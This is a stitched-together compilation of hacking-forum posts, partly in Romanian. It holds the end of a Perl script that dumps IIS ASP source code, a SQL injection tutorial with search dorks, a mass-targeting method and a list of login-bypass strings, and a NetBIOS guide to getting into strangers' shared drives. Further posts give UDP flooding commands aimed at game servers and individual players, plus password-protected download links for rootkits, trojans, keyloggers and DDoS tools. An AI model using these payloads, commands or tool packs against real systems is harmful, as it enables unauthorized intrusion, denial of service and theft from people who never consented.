socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error:
$!";
connect(SOCK, $paddr) || die "Error: $!";
send(SOCK, $ver, 0) || die "Can't to send packet: $!";
open(OUT, ">$server.txt");
print "Dumping $cm to $server.txt \n";
while(<SOCK>) {
print OUT <SOCK>;
}
sub howto {
print "type as follows: Trans.pl www.victim.com codetoview.asp \n\n";
}
close OUT;
$n=0;
$type=2;
close(SOCK);
exit(1);
}
If we call the script as translate.pl then we can get a ASA/ASP source code
as follows
Trasn.pl www.victim.com codetoview.asp
And there you go, you get the source code of codeview.asp.
04- Conclusion
All the information i have given you has been widely used in wild. However
what i tried to do was just to collect all these information together as to
check the security of our famous IIS 4.0 and 5.0. Wheneveri encounter a IIS
web server during my pen-tests, i do check for these vulnerabilities and
most of the time one of these works.
I hope that, what i written was helped you in some way. Thanks for reading
it, please continue to support me as i continue to release this sortta
papers. If you wanna learn more, please check the mentioned people’s web
sites for more details and you can even write to me.
Peace in mind
Watch your servers in wild
-
Author: ComSec
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
ComSec aka ZSL
http://comsec.governmentsecurity.org
*******************************************
WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know ay
******************************************
-
By anand bhaskar
--------------hacking the bios--------------
by anand bhaskar.
hey friends,
i know hacking with bios is considered lame by the hackers n it indeed
is lame but i m sure this gives a good practice at the intial stages n
some idea of what the hell it like getting into someone else's computer.
the basic limitation of this method is that only shared files can b
accessed.however there r ways to hack the not shared one's too but
is all i wish too provide u all now.enjoy.
introduction
1. Hardware and Firmware
1a. The BIOS
The BIOS, short for Basic Input/Output Services, is the control
program of the PC. It is responsible for starting up your computer,
transferring control of the system to your operating system, and
for handling other low-level functions, such as disk access.
NOTE that the BIOS is not a software program, insofar as it is
not purged from memory when you turn off the computer. It's
firmware, which is basically software on a chip.
A convenient little feature that most BIOS manufacturers include
is a startup password. This prevents access to the system until
you enter the correct password.
If you can get access to the system after the password has been
entered, then there are numerous software-based BIOS password
extractors available from your local H/P/A/V site.
NETBIOS/NBTSTAT - What does it do?
2. NETBIOS, also known as NBTSTAT is a program run on the Windows system and is used for identifying a remote network or computer for file sharing enabled. We can expoit systems using this method. It may be old but on home pc's sometimes it still works great. You can use it on your friend at home or something. I don't care what you do, but remember, that you are reading this document because you want to learn. So I am going to teach you. Ok. So, you ask, "How do i get to NBTSTAT?" Well, there are two ways, but one's faster.
Method 1
-===============-
Start
Programs
MSDOS PROMPT
Type NBTSTAT
-===============-
Method 2
-===============-
Start
Run
Type Command
Type NBTSTAT
-===============-
(Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.)
Ok! Now since you're in the DOS command under NBTSTAT, you're probably wondering what all that crap is that's on your screen. These are the commands you may use. I'm only going to give you what you need to know since you are striving to be l33t. Your screen should look like the following:
----------------------------------------------------------------------------------------------
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refr
esh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.
C:\WINDOWS\DESKTOP>
-----------------------------------------------------------------------------------------------
The only two commands that are going to be used and here they are:
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
Host Names
3. Now, the -a means that you will type in the HOST NAME of the person's computer that you are trying to access. Just in case you don't have any idea what a Host Name looks like here's an example.
123-fgh-ppp.internet.com
there are many variations of these adresses. For each different address you see there is a new ISP assigned to that computer. look at the difference.
abc-123.internet.com
ghj-789.newnet.com
these are differnet host names as you can see, and, by identifying the last couple words you will be able to tell that these are two computers on two different ISPs. Now, here are two host names on the same ISP but a different located server.
123-fgh-ppp.internet.com
567-cde-ppp.internet.com
IP Addresses
4. You can resolce these host names if you want to the IP address (Internet Protocol)
IP addresses range in different numbers. An IP looks like this:
201.123.101.123
Most times you can tell if a computer is running on a cable connection because of the IP address's numbers. On faster connections, usually the first two numbers are low. here's a cable connection IP.
24.18.18.10
on dialup connections IP's are higher, like this:
208.148.255.255
notice the 208 is higher than the 24 which is the cable connection.
REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS.
Some companies make IP addresses like this to fool the hacker into believing it's a dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway This gives you an idea on IP addresses which you will be using on the nbtstat command.
Getting The IP Through DC (Direct Connection)
5. First. You're going to need to find his IP or host name. Either will work. If you are on mIRC You can get it by typing /whois (nick) ...where (nick) is the persons nickname without parenthesis. you will either get a host name or an IP. copy it down. If you do not get it or you are not using mIRC then you must direct connect to their computer or you may use a sniffer to figure out his IP or host name. It's actually better to do it without the sniffer because most sniffers do not work now-a-days. So you want to establish a direct connection to their computer. OK, what is a direct connection? When you are:
Sending a file to their computer you are directly connected.
AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted.
ICQ when sending a file or a chat request acception allows a direct connection.
Any time you are sending a file. You are directly connected. (Assuming you know the user is not using a proxy server.)
Voice Chatting on Yahoo establishes a direct connection.
If you have none of these programs, either i suggest you get one, get a sniffer, or read this next statement.
If you have any way of sending thema link to your site that enables site traffic statistics, and you can log in, send a link to your site, then check the stats and get the IP of the last visitor. It's a simple and easy method i use. It even fool some smarter hackers, because it catches them off guard. Anyway, once you are directly connected use either of the two methods i showed you earlier and get into DOS. Type NETSTAT -n. NETSTAT is a program that's name is short for NET STATISTICS. It will show you all computers connected to yours. (This is also helpful if you think you are being hacked by a trojan horse and is on a port that you know such as Sub Seven: 27374.) Your screen should look like this showing the connections to your computer:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 205.188.8.7:26778 ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
The first line indicated the Protocol (language) that is being used by the two computers.
TCP (Transfer Control Protocol) is being used in this and is most widely used.
Local address shows your IP address, or the IP address of the system you on.
Foreign address shows the address of the computer connected to yours.
State tells you what kind of connection is being made ESTABLISHED - means it will stay connected to you as long as you are on the program or as long as the computer is allowing or is needing the other computers connection to it. CLOSE_WAIT means the connection closes at times and waits until it is needed or you resume connection to be made again. One that isn't on the list is TIME_WAIT which means it is timed. Most Ads that run on AOL are using TIME_WAIT states.
the way you know the person is directly connected to your computer is because of this:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 abc-123-ppp.webnet.com ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
Notice the host name is included in the fourth line instead of the IP address on all. This is almost ALWAYS, the other computer that is connected to you. So here, now, you have the host name:
abc-123-ppp.webnet.com
If the host name is not listed and the IP is then it NO PROBLEM because either one works exactly the same. I am using abc-123-ppp.webnet.com host name as an example. Ok so now you have the IP and/or host name of the remote system you want to connect to. Time to hack!
Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's the crap again. Well, now time to try out what you have leanred from this document by testing it on the IP and/or host name of the remote system. Here's the only thing you'll need to know.
IMPORTANT, READ NOW!!!
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
Remember this?
Time to use it.
-a will be the host name
-A will be the IP
How do i know this?
Read the Statements following the -a -A commands. It tells you there what each command takes.
So have you found which one you have to use?
GOOD!
Time to start.
Using it to your advantage
6. Type this if you have the host name only.
NBTSTAT -a (In here put in hostname without parenthesis)
Type this is you have the IP address only.
NBTSTAT -A (In here put in IP address without parenthesis)
Now, hit enter and wait. Now Either one of two things came up
1. Host not found
2. Something that looks like this:
--------------------------------------------
NetBIOS Local Name Table
Name Type Status
---------------------------------------------
GMVPS01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
GMVPS01 <03> UNIQUE Registered
GMVPS01 <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
---------------------------------------------
If the computer responded "Host not found" Then either one of two things are the case:
1. You screwed up the host name.
2. The host is not hackable.
If number one is the case you're in great luck. If two, This system isn't hackable using the NBTSTAT command. So try another system.
If you got the table as above to come up, look at it carefully as i describe to you each part and its purpose.
Name - states the share name of that certain part of the computer
<00>, <03>, <20>, <1E> - Are the Hexidecimal codes giving you the services available on that share name.
Type - Is self-explanatory. It's either turned on, or activated by you, or always on.
Status - Simply states that the share name is working and is activated.
Look above and look for the following line:
GMVPS01 <20> UNIQUE Registered
See it?
GOOD! Now this is important so listen up. The Hexidecimanl code of <20> means that file sharing is enabled on the share name that is on that line with the hex number. So that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's How to do it. (This is the hard part)
LMHOST File
7. There is a file in all Windows systems called LMHOST.sam. We need to simply add the IP into the LMHOST file because LMHOST basically acts as a network, automatically logging you on to it. So go to Start, Find, FIles or Folders. Type in LMHOST and hit enter. when it comes up open it using a text program such as wordpad, but make sure you do not leave the checkmark to "always open files with this extension" on that. Simply go through the LMHOST file until you see the part:
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
Read this over and over until you understand the way you want your connection to be set. Here's an example of how to add an IP the way I would do it:
#PRE #DOM:255.102.255.102 #INCLUDE
Pre will preload the connection as soon as you log on to the net. DOM is the domain or IP address of the host you are connecting to. INCLUDE will automaticall set you to that file path. In this case as soon as I log on to the net I will get access to 255.102.255.102 on the C:/ drive. The only problem with this is that by doin the NETSTAT command while you are connected, and get the IP of your machine. That's why it only works on simple PC machines. Because people in these days are computer illiterate and have no idea of what these commands can do. They have no idea what NETSTAT is, so you can use that to your advantage. Most PC systems are kind of hard to hack using this method now because they are more secure and can tell when another system is trying to gain access. Also, besure that you (somehow) know whether they are running a firewall or not because it will block the connection to their computer. Most home systems aren't running a firewall, and to make it better, they don't know how operate the firewall, therefore, leaving the hole in the system. To help you out some, it would be a great idea to pick up on some programming languages to show you how the computer reads information and learn some things on TCP/IP (Transfer Control Protocol/Internet Protocol) If you want to find out whether they are running a firewall, simply hop on a Proxy and do a port scan on their IP. You will notice if they are running a firewall because most ports are closed. Either way, you still have a better chance of hacking a home system than hacking Microsoft.
Gaining Access
7. Once you have added this to you LMHOST file. You are basically done. All you need to do is go to:
Start
Find
Computer
Once you get there you simply type the IP address or the host name of the system. When it comes up, simply double click it, and boom! There's a GUI for you so you don't have to use DOS anymore. You can use DOS to do it, but it's more simple and fun this way, so that's the only way i put it. When you open the system you can edit, delete,
-
de cate ori am citit acelasi lucru:
sunteti cei mai tari
wow ce forum k-lumea
am auzit ca e tare rau forumu ( ce destept e google asta )
si alte dastea
nu e pentru unii e pentru aia stresanti care intra, iau programele sa le puna pe alte forumuri si in rest stau si se uita si mai posteaza si ei pe la off topic si pe la bine ai venit
sunteti penibili
nu mai mintiti
nu va crede nimeni
nu e pentru Kre@tor cine stie se simte
-
ma in curand va faceti parc in curtea blocului... mai avei sa furati neste leagane, balansoare, topogane si sa luati o tasnitoare daia furati neste tevi va legati la reteaua de apa (sa aveti si apa sa beti nu de alta) si gata... parc facut din alte parcuri
-
tutorialul e pe multe forumuri hack.... eu il am de la cnva de pe mess
-
- partea 1- budai beer rilouded
sa razi sa te caci pe tn asta e ptr cn nu a vazut apropo tv sau ptr cn nu lea vazut pe youtube
prima parte a depasiti 150.000 (da am pus zerourile bn) de vizualizari cel mai tare de pe youtube cik...
SHI FAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASHI????????????????
-
man nush io am cautat dupa titlu cand am cautat nu am gastit titlu la fel deci am postat sorry
-
Din greseala am dat peste un programel ce functioneaza pe porturile UDP (la fel ca si Counter Strike). Ce face acest programel? Trimite foarte multe date in continuu la infinit si provoaca un lag imens. Nu a fost creeat pentru asa ceva dar... am avut eu un feeling ca va functiona daca voi incerca.
Mare atentie: daca il veti folosi de pe pc-ul vostru este posibil sa aveti probleme pentru ca va apare ip-ul real. Si da, functioneaza pe orice server de Counter Strike si probabil are efect asupra oricarei aplicatii ce foloseste protocolul UDP.
Programul il puteti downloada de aici: http://aluigi.altervista.org/testz/udpsz.zip (click dreapta pe link si save as... altfel nu va porni download)
sau de aici: http://rapidshare.com/files/30616931/udpsz.zip.html
Folositi sintaxa urmatoare:
Cod:
udpsz -l 0 hostname.domeniu.ro 27015 55555
Sau daca vreti ca un jucator sa aiba lag mare sau sa nu se poata conecta pe NICIUN server puneti ip-ul lui si port 27005
Exemplu:
Cod:
udpsz -l 0 212.1.1.1 27005 55555
Inlocuiti hostname.domeniu.ro cu serverul in care vreti sa dati sau 212.1.1.1 cu ip-ul jucatorului pe care vreti sa il floodati individual.
Mie mia mers
-
:::::::::::::::::::::::::::::::
r00tKiT Windowz All in One
:::::::::::::::::::::::::::::::
-AFX Rootkit 2005
-BootRootkit (eEye)
-FakeNetstat
-Hacker Defender 1.0.0 revisited
-He4Hook v2.1.5b6
-NuclearRootkit v1.0
-Vanquish v0.2.1
Download: http://rapidshare.com/files/31789578/rpwa.rar
Password: d4rk-r3v-t34m
-
Trojans/Backdoors
Trojan Horses
- Yuri RAT v1.2
- MofoTro v1.7 BETA
- Charon
- Beast v2.0.7
- Omerta v1.3
- Theef v2.10
- Combined Forces R.A.T
- MoSucker v3.0
- ProRat v1.9 Fix2
Keyloggers
- Elite Keylogger v1.0
- SKL v0.1
- KeySpy v2.0
- A++++
- Curiosity
- Keylogger
- KeyCopy
Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner
WebHacks/WordLists
Brute Forcers
- Munga Bunga 's Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix
CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner
Virus!
Viruses
- Hippi virus
- Sasser
- W32. Blaster .Worm
- Midnight Massacre
- 00001
- Nimda
- Loveletter virus
- Happy '99
- MXZ
Virus Builders
- DR VBS
- VBSwg 2 beta - Virus builder
- p0ke's WormGen 2.0
- RESIDUO - DoS Virus
MSN Hacks & Bots
- HoaX Toolbox 1.1
- MSN Extreme 3.0
- MessenPass v1.06
- Advanced Blood Scroller
- Nudge Madness
- Advanced Instant Messengers Password Recovery
- Contact Spy
- Msn Explosion
- Encrypted Messenger
Port & IP Scanners
- Blues Port Scanner
- ProPort v2.2
- SuperScan v3.0
- Net Scan Tools v4.2
- LanSpy v2.0
- Bitchin Threads v3.1
- Trojan Hunter v1.5
- SuperScan v4.0
- Neotrace PRO v3.25 trial&crack
Nukers And Flooders
- Rocket v1.0
- RPCNuke v1.0
- Panther Mode1 - 56k
- Panther Mode2 - ISDN +
- Final Fortune v2.4
- Battle Pong - Technophoria
- Assault v1.0
- ICMP Nuker
- CLICK v2.2
EXTRA!
- Telnet Tutorial
DOWNLOAD
http://rapidshare.de/files/29727065/UltimateHacking2007.rar
password
errorised
-
-MailerX = You can spam with email! (it contains an smtp server)
-PHP Attacker = is a program that allow you to run exploitz on a website.(php)
-PhpNuke = Is a program that allows you to make sql injection on phpnuke sites (IT WORKS IS AWESOME)
-PHP-Nuke_Hacker = is a program that allow you to run exploitz on any website finding exploits from www.milw0rm.com
-IFRAME_DDoS_v1[1].0= You can flood a website with multiple connections
-Reuploaded=is a webnuker for websites! (it works great)
-ICMP DoS=You can flood a website
-IP_Hider_v2[1].7_-xray-=Is a good one for hiding you ip..(i am using it)
-PP-checker=Paypal checker to hack paypal accounts
-BrutusAET2 Host by HybriD3_2= one of best bruteforces ever
-evilsmiley= an .exe file that an evil face with an evil smiley appears on your monitor and u cant do anything ( a funny one )
-CSF-(c-sploiter final)= i will let you to check this out alone
-AntiDote_v1[1].2_osCE=To make a trojan undetected!
-Nudge_Madness=basicly is an autoclicker
-msn-nudger=it spams your contacts with nudges
-YouTUBE_downloader_2.1.1=you can download the videos on youtube with this program
-MEssBlackFrezzerBeta=You can freeze someone's account on msn
-bugs.txt= a text file that contains different bugs like a site could have...
-sploof_v0.90.installer= a program to try a website's security....
-proxylist.txt = contains proxies
-proxies.txt= contains proxies
-ipstealer = is a shell that helps you to steal someone's ip
Password for AntiDote_v1[1].2_osCE is:
osC++CoDeRDownload: http://rapidshare.com/files/37798225/pack.rar
Nu am mai vazut asta pe forum so enjoy
-
http://www.steve.org.uk/Hacks/XSS/index.html
chiar bun tutorialu...
-
aha... problema e ca am o problema... am dat
cd\
cd perl
flood_ip.pl
cum scrie in tutorial si in loc sa imi ceara host etc....
mie imi deschide fisieru unde e scris codu unde am gresit?
-
Apple ID
in Cosul de gunoi
Posted
Nimeni?? come on... va rog... un raspuns aici